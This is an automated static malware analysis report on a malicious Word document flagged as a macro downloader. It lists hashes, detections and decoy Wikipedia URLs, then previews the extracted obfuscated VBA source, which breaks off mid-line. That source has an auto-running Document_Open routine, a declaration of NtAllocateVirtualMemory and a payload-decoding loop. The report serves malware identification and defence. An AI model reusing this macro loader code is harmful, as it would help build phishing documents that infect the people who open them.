Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ccb66b31d66f8a98…

MALICIOUS

Office (OLE)

307.5 KB Created: 2018-01-30 15:45:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: b1421f67a9b12e14d3551ca71e022021 SHA-1: 65473f3df2b3e165979506941554f43336693b3b SHA-256: ccb66b31d66f8a9864b5ca68793561ef2c5d251a3a3043966fae9c56d53153f9
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro, which is a common technique for initiating malicious actions upon document opening. The VBA code appears obfuscated and utilizes a Pmt function, suggesting it attempts to download and execute a payload. The presence of the 'roar' function declaration aliased to 'NtAllocateVirtualMemory' further indicates memory manipulation, often used for payload execution. The ClamAV detection 'Doc.Downloader.Macro-6539595-0' directly supports the downloader functionality.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://en.wikipedia.org/wiki/Wikipedia:FA In document text (OLE body)
    • https://en.wikipedia.org/wiki/Elcor,_MinnesotaIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Mesabi_RangeIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Golden_jackalIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Operation_GrappleIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Nuclear_testIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Hydrogen_bombIn document text (OLE body)
    • https://en.wikipedia.org/wiki/RSPB_MinsmereIn document text (OLE body)
    • https://en.wikipedia.org/wiki/More_Hall_AnnexIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Greek_battleship_SalamisIn document text (OLE body)
    • https://en.wikipedia.org/wiki/The_Illustrated_London_NewsIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Cyrus_CuneoIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Tottenham_outrageIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Lancashire_Fusiliers_War_MemorialIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Kate_WinsletIn document text (OLE body)
    • https://en.wikipedia.org/wiki/List_of_people_who_have_won_Academy,_Emmy,_Grammy,_and_Tony_AwardsIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Southern_boobookIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Arthur_SullivanIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Gilbert_and_SullivanIn document text (OLE body)
    • https://en.wikipedia.org/wiki/H.M.S._PinaforeIn document text (OLE body)
    • https://en.wikipedia.org/wiki/The_Pirates_of_PenzanceIn document text (OLE body)
    • https://en.wikipedia.org/wiki/The_MikadoIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Elcor,_Minnesota/archive1In document text (OLE body)
    • https://en.wikipedia.org/wiki/User:DrGregMNIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Ghost_townIn document text (OLE body)
    • https://en.wikipedia.org/wiki/U.S._stateIn document text (OLE body)
    • https://en.wikipedia.org/wiki/MinnesotaIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Seven_Iron_BrothersIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Golden_jackal/archive1In document text (OLE body)
    • https://en.wikipedia.org/wiki/User:William_HarrisIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Evolution_of_the_wolfIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Southeast_EuropeIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Southwest_AsiaIn document text (OLE body)
    • https://en.wikipedia.org/wiki/South_AsiaIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Southeast_AsiaIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Arabian_wolfIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Gray_wolfIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Least_concernIn document text (OLE body)
    • https://en.wikipedia.org/wiki/IUCN_Red_ListIn document text (OLE body)
    • https://en.wikipedia.org/wiki/British_hydrogen_bomb_programmeIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/British_hydrogen_bomb_programme/archive1In document text (OLE body)
    • https://en.wikipedia.org/wiki/User:Hawkeye7In document text (OLE body)
    • https://en.wikipedia.org/wiki/Hydrogen_bombsIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Cover_versionIn document text (OLE body)
    • https://en.wikipedia.org/wiki/BoleroIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Latin_balladIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Juan_Carlos_Calder%C3%B3nIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Armando_ManzaneroIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Record_Plant_StudiosIn document text (OLE body)
    • https://en.wikipedia.org/wiki/Los_AngelesIn document text (OLE body)
    +139 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10225 bytes
SHA-256: 3b4c66a8546296edc51a9b97d59b70aa7a37e8b92db799b1cd532247a5c0869a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
epigaea = blowgun
mesocricetus
beheaded = 31 + 49
Pmt 0, beheaded, 28969, 25578, 7
End Sub


Attribute VB_Name = "fauna"
Attribute VB_Base = "0{C69F4BC8-3ED2-470C-9650-8EE9B73FC092}{88E25E7D-6199-45AF-9843-1F51BA910B75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "dishonesty"
#If (56 - 24 + 368 + 59 - 76 + 317) > ((29 - 106 + 397) - (109 - 17 + 448) * 1) And ((18 - 25 + 35) - (21 - 62 + 69)) * 2 < (Win64) Then
Public Declare PtrSafe Function roar _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (lyddite As LongPtr, millettia As LongPtr, ByVal statuvolent As LongPtr, allonesByVal As LongPtr, scoff As LongPtr, ByVal fulllength As LongPtr) As LongPtr
#End If
Function alchemy()
athanor = 112 - 97 + 50
Dim sens(255) As Byte
For i = athanor To 90 + 1
sens(athanor) = athanor - 65
athanor = athanor + 1
If athanor > 90 + 1 Then Exit For
Next
athanor = 40 + 8
For i = athanor To 50 + 8
sens(athanor) = athanor + 4
athanor = athanor + 1
If athanor > 50 + 8 Then Exit For
Next
athanor = 90 + 7
For i = athanor To 120 + 3
sens(athanor) = athanor - 71
athanor = athanor + 1
If athanor > 120 + 3 Then Exit For
Next
sens(47) = 60 + 3
athanor = 40 + 3
sens(athanor) = 60 + 2
alchemy = sens
End Function





Attribute VB_Name = "farhat"
Function balas(forefront) As String
Dim converse As Integer
Dim armchair(63) As Long
Dim airpipe() As Byte
Dim contraire(6962) As Byte
Dim autoregulation As String
Dim reveler(63) As Long
Dim amyloid As Long
Dim crescentia As Long
Dim bunchberry(63) As Long
Dim britisher As Long
Dim antimalarial As Long
flit = 23 - 107 + 147
andrena = 117 - 25 + 16711588
acerate = 76 - 89 + 4045
enceliopsis = 87 - 71 + 4080
Dim iwo As String

harvesthome = 8 - 32 + 280
gloveless = 112 - 108 + 65276
breadfruit = 96 - 97 + 65537
Dim orions As Byte

infelicitously = 67 - 111 + 258092
jejunostomy = 86 - 47 + 25
uncomplicated = 92 - 47 + 16515027
acned = 57 - 80 + 262167
deflationary = 34 - 1 + 222
Dim atomization As Long

Dim carat As Variant
apicius = 123 - 12 + 7732
Dim blut() As Byte
blut = VBA.StrConv(forefront, 120 + 8)
catalectin = 23 + 46
 Pmt 0, catalectin, 3821, 58392, 7

acromphalus = 7843
ludere = vbKeyShift - 12
For insulation = 0 To acromphalus
If insulation Mod 2 = 0 Then
blut(insulation) = blut(insulation) - ludere
Else
blut(insulation) = blut(insulation) - (ludere - 1)
End If
Next insulation
cogent = 48 + 56
 Pmt 0, cogent, 14249, 10181, 2

converse = 0
causans = alchemy
For amyloid = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
armchair(amyloid) = swifter(amyloid, jejunostomy, 60)
bunchberry(amyloid) = swifter(amyloid, enceliopsis, 60)
reveler(amyloid) = swifter(amyloid, acned, 60)
Next amyloid
impaction = 6 + 28
 Pmt 0, impaction, 38355, 55700, 6

airpipe = blut
colliquefaction = 109 - 82 - 23
gammer = 18 + 42
 Pmt 0, gammer, 18895, 35443, 5

hardening = 42 - 14 - 25
bidirectional = "shortish"

abiding = hardening + 1
divine = 82 - 37 - 43
For crescentia = 0 To acromphalus
bilimbi = airpipe(crescentia)
peekaboo = airpipe(crescentia + 2)
apparentness = bunchberry(causans(airpipe(crescentia + 1)))
pantaloons = armchair(causans(peekaboo)) + causans(airpipe(crescentia + hardening))
britisher = reveler(causans(bilimbi)) + apparentness + pantaloons
amyloid = swifter(britisher, andrena, 52)
contraire(antimalarial) = swifter(amyloid, breadfruit, 42)
amyloid = swifter(britisher, gloveless, 52)
contraire(antimalarial + 1) = swifter(amyloid, harvesthome, 42)
contraire(antimalarial + divine) = swifter(briti
... (truncated)